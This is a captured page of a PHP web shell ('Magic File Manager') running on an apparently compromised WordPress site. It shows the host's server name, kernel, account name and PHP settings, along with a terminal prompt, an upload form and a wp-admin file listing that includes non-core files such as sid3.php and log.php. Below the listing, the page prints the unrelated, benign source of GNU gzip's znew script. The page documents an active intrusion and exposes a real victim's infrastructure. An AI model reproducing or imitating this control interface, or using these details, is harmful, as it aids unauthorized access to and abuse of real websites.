โœจ Magic File Manager

๐Ÿš€ Hostinger Optimized
๐Ÿ–ฅ๏ธ Server: Apache
๐Ÿ’ป System: Linux bom1plzcpnl503817.prod.bom1.secureserver.net 4.18.0-553.141.2.lve.el8.x86_64 #1 SMP Wed Jul 8 16:10:02 UTC 2026 x86_64
๐Ÿ‘ค User: pnj6a06usxf3 (9714991)
๐Ÿ˜ PHP: 8.1.34
๐Ÿšซ Disabled: โœจ NONE

๐Ÿ’ป Terminal

๐Ÿ“ /home/pnj6a06usxf3/public_html/korwalsolars.com/wp-admin
$

๐Ÿ“ Create New

โฌ†๏ธ Upload File

๐Ÿ“Š Max upload: 32M | ๐Ÿ“ฆ Max POST: 128M

๐Ÿ“„ Name๐Ÿ“Š Size๐Ÿ”’ Permโšก Actions
๐Ÿ“ css--drwxr-xr-x
๐Ÿ“ images--drwxr-xr-x
๐Ÿ“ includes--drwxr-xr-x
๐Ÿ“ js--drwxr-xr-x
๐Ÿ“ maint--drwxr-xr-x
๐Ÿ“ network--drwxr-xr-x
๐Ÿ“ user--drwxr-xr-x
๐Ÿ˜ about.php17.572 KB-rw-r--r--
๐Ÿ˜ admin-ajax.php5.025 KB-rw-r--r--
๐Ÿ˜ admin-footer.php2.738 KB-rw-r--r--
๐Ÿ˜ admin-functions.php0.461 KB-rw-r--r--
๐Ÿ˜ admin-header.php9.066 KB-rw-r--r--
๐Ÿ˜ admin-post.php1.974 KB-rw-r--r--
๐Ÿ˜ admin.php12.632 KB-rw-r--r--
๐Ÿ˜ async-upload.php5.473 KB-rw-r--r--
๐Ÿ˜ authorize-application.php10.093 KB-rw-r--r--
๐Ÿ˜ comment.php11.37 KB-rw-r--r--
๐Ÿ˜ contribute.php5.523 KB-rw-r--r--
๐Ÿ˜ credits.php4.044 KB-rw-r--r--
๐Ÿ˜ custom-background.php0.471 KB-rw-r--r--
๐Ÿ˜ custom-header.php0.48 KB-rw-r--r--
๐Ÿ˜ customize.php11.314 KB-rw-r--r--
๐Ÿ˜ edit-comments.php14.145 KB-rw-r--r--
๐Ÿ˜ edit-form-advanced.php28.79 KB-rw-r--r--
๐Ÿ˜ edit-form-blocks.php15.164 KB-rw-r--r--
๐Ÿ˜ edit-form-comment.php13.652 KB-rw-r--r--
๐Ÿ˜ edit-link-form.php6.198 KB-rw-r--r--
๐Ÿ˜ edit-tag-form.php10.408 KB-rw-r--r--
๐Ÿ˜ edit-tags.php21.982 KB-rw-r--r--
๐Ÿ˜ edit.php19.484 KB-rw-r--r--
๐Ÿ˜ erase-personal-data.php7.329 KB-rw-r--r--
๐Ÿ“„ error_log45.666 KB-rw-r--r--
๐Ÿ˜ export-personal-data.php7.754 KB-rw-r--r--
๐Ÿ˜ export.php11.001 KB-rw-r--r--
๐Ÿ˜ font-library.php1.445 KB-rw-r--r--
๐Ÿ˜ freedoms.php4.467 KB-rw-r--r--
๐Ÿ˜ import.php7.584 KB-rw-r--r--
๐Ÿ˜ index.php7.68 KB-rw-r--r--
๐Ÿ˜ install-helper.php6.798 KB-rw-r--r--
๐Ÿ˜ install.php17.944 KB-rw-r--r--
๐Ÿ˜ link-add.php0.912 KB-rw-r--r--
๐Ÿ˜ link-manager.php4.259 KB-rw-r--r--
๐Ÿ˜ link-parse-opml.php2.657 KB-rw-r--r--
๐Ÿ˜ link.php2.888 KB-rw-r--r--
๐Ÿ˜ load-scripts.php2.021 KB-rw-r--r--
๐Ÿ˜ load-styles.php2.925 KB-rw-r--r--
๐Ÿ˜ log.php63.893 KB-rw-r--r--
๐Ÿ˜ media-new.php3.173 KB-rw-r--r--
๐Ÿ˜ media-upload.php3.582 KB-rw-r--r--
๐Ÿ˜ media.php0.8 KB-rw-r--r--
๐Ÿ˜ menu-header.php9.816 KB-rw-r--r--
๐Ÿ˜ menu.php17.709 KB-rw-r--r--
๐Ÿ˜ moderation.php0.3 KB-rw-r--r--
๐Ÿ˜ ms-admin.php0.191 KB-rw-r--r--
๐Ÿ˜ ms-delete-site.php4.505 KB-rw-r--r--
๐Ÿ˜ ms-edit.php0.211 KB-rw-r--r--
๐Ÿ˜ ms-options.php0.224 KB-rw-r--r--
๐Ÿ˜ ms-sites.php0.21 KB-rw-r--r--
๐Ÿ˜ ms-themes.php0.212 KB-rw-r--r--
๐Ÿ˜ ms-upgrade-network.php0.214 KB-rw-r--r--
๐Ÿ˜ ms-users.php0.21 KB-rw-r--r--
๐Ÿ˜ my-sites.php4.718 KB-rw-r--r--
๐Ÿ˜ nav-menus.php49.022 KB-rw-r--r--
๐Ÿ˜ network.php5.394 KB-rw-r--r--
๐Ÿ˜ options-connectors.php1.507 KB-rw-r--r--
๐Ÿ˜ options-discussion.php16.019 KB-rw-r--r--
๐Ÿ˜ options-general.php22.319 KB-rw-r--r--
๐Ÿ˜ options-head.php0.6 KB-rw-r--r--
๐Ÿ˜ options-media.php6.484 KB-rw-r--r--
๐Ÿ˜ options-permalink.php21.964 KB-rw-r--r--
๐Ÿ˜ options-privacy.php10.453 KB-rw-r--r--
๐Ÿ˜ options-reading.php9.959 KB-rw-r--r--
๐Ÿ˜ options-writing.php9.184 KB-rw-r--r--
๐Ÿ˜ options.php13.932 KB-rw-r--r--
๐Ÿ˜ plugin-editor.php13.741 KB-rw-r--r--
๐Ÿ˜ plugin-install.php7.259 KB-rw-r--r--
๐Ÿ˜ plugins.php30.023 KB-rw-r--r--
๐Ÿ˜ post-new.php2.703 KB-rw-r--r--
๐Ÿ˜ post.php10.567 KB-rw-r--r--
๐Ÿ˜ press-this.php2.412 KB-rw-r--r--
๐Ÿ˜ privacy-policy-guide.php3.668 KB-rw-r--r--
๐Ÿ˜ privacy.php2.453 KB-rw-r--r--
๐Ÿ˜ profile.php0.276 KB-rw-r--r--
๐Ÿ˜ revision.php5.699 KB-rw-r--r--
๐Ÿ˜ setup-config.php17.508 KB-rw-r--r--
๐Ÿ˜ sid3.php55.304 KB-rw-r--r--
๐Ÿ˜ site-editor.php12.19 KB-rw-r--r--
๐Ÿ˜ site-health-info.php4.075 KB-rw-r--r--
๐Ÿ˜ site-health.php10.183 KB-rw-r--r--
๐Ÿ˜ term.php2.196 KB-rw-r--r--
๐Ÿ˜ theme-editor.php16.874 KB-rw-r--r--
๐Ÿ˜ theme-install.php23.745 KB-rw-r--r--
๐Ÿ˜ themes.php48.563 KB-rw-r--r--
๐Ÿ˜ tools.php3.432 KB-rw-r--r--
๐Ÿ˜ update-core.php45.119 KB-rw-r--r--
๐Ÿ˜ update.php12.756 KB-rw-r--r--
๐Ÿ˜ upgrade-functions.php0.333 KB-rw-r--r--
๐Ÿ˜ upgrade.php6.24 KB-rw-r--r--
๐Ÿ˜ upload.php14.934 KB-rw-r--r--
๐Ÿ˜ user-edit.php40.863 KB-rw-r--r--
๐Ÿ˜ user-new.php24.086 KB-rw-r--r--
๐Ÿ˜ users.php25.096 KB-rw-r--r--
๐Ÿ˜ widgets-form-blocks.php5.112 KB-rw-r--r--
๐Ÿ˜ widgets-form.php19.129 KB-rw-r--r--
๐Ÿ˜ widgets.php1.086 KB-rw-r--r--
#!/bin/sh # Copyright (C) 1998, 2002, 2004, 2007, 2010-2018 Free Software Foundation, # Inc. # Copyright (C) 1993 Jean-loup Gailly # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 3 of the License, or # (at your option) any later version. # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # You should have received a copy of the GNU General Public License along # with this program; if not, write to the Free Software Foundation, Inc., # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. version="znew (gzip) 1.9 Copyright (C) 2010-2017 Free Software Foundation, Inc. This is free software. You may redistribute copies of it under the terms of the GNU General Public License . There is NO WARRANTY, to the extent permitted by law. Written by Jean-loup Gailly." usage="Usage: $0 [OPTION]... [FILE]... Recompress files from .Z (compress) format to .gz (gzip) format. Options: -f Force recompression even if a .gz file already exists. -t Test the new files before deleting originals. -v Verbose; display name and statistics for each file compressed. -9 Use the slowest compression method (optimal compression). -P Use pipes for the conversion to reduce disk space usage. -K Keep a .Z file when it is smaller than the .gz file; implies -t. --help display this help and exit --version output version information and exit Report bugs to ." check=0 pipe=0 opt= files= keep=0 res=0 old=0 new=0 block=1024 # block is the disk block size (best guess, need not be exact) # Beware -s or --suffix in $GZIP. unset GZIP ext=.gz for arg do case "$arg" in --help) printf '%s\n' "$usage" || exit 1; exit;; --version) printf '%s\n' "$version" || exit 1; exit;; -*) opt="$opt $arg"; shift;; *) break;; esac done if test $# -eq 0; then echo >&2 "$0: invalid number of operands; try \`$0 --help' for help" exit 1 fi opt=`printf '%s\n' "$opt" | sed -e 's/ //g' -e 's/-//g'` case "$opt" in *t*) check=1; opt=`printf '%s\n' "$opt" | sed 's/t//g'` esac case "$opt" in *K*) keep=1; check=1; opt=`printf '%s\n' "$opt" | sed 's/K//g'` esac case "$opt" in *P*) pipe=1; opt=`printf '%s\n' "$opt" | sed 's/P//g'` esac if test -n "$opt"; then opt="-$opt" fi for i do n=`printf '%s\n' "$i" | sed 's/.Z$//'` if test ! -f "$n.Z" ; then printf '%s\n' "$n.Z not found" res=1; continue fi test $keep -eq 1 && old=`wc -c < "$n.Z"` if test $pipe -eq 1; then if gzip -d < "$n.Z" | gzip $opt > "$n$ext"; then # Copy file attributes from old file to new one, if possible. touch -r"$n.Z" -- "$n$ext" 2>/dev/null chmod --reference="$n.Z" -- "$n$ext" 2>/dev/null else printf '%s\n' "error while recompressing $n.Z" res=1; continue fi else if test $check -eq 1; then if cp -p "$n.Z" "$n.$$"; then : else printf '%s\n' "cannot backup $n.Z" res=1; continue fi fi if gzip -d "$n.Z"; then : else test $check -eq 1 && mv "$n.$$" "$n.Z" printf '%s\n' "error while uncompressing $n.Z" res=1; continue fi if gzip $opt "$n"; then : else if test $check -eq 1; then mv "$n.$$" "$n.Z" && rm -f "$n" printf '%s\n' "error while recompressing $n" else # compress $n (might be dangerous if disk full) printf '%s\n' "error while recompressing $n, left uncompressed" fi res=1; continue fi fi test $keep -eq 1 && new=`wc -c < "$n$ext"` if test $keep -eq 1 && test `expr \( $old + $block - 1 \) / $block` -lt \ `expr \( $new + $block - 1 \) / $block`; then if test $pipe -eq 1; then rm -f "$n$ext" else mv "$n.$$" "$n.Z" && rm -f "$n$ext" fi printf '%s\n' "$n.Z smaller than $n$ext -- unchanged" elif test $check -eq 1; then if gzip -t "$n$ext" ; then rm -f "$n.$$" "$n.Z" else test $pipe -eq 0 && mv "$n.$$" "$n.Z" rm -f "$n$ext" printf '%s\n' "error while testing $n$ext, $n.Z unchanged" res=1; continue fi elif test $pipe -eq 1; then rm -f "$n.Z" fi done exit $res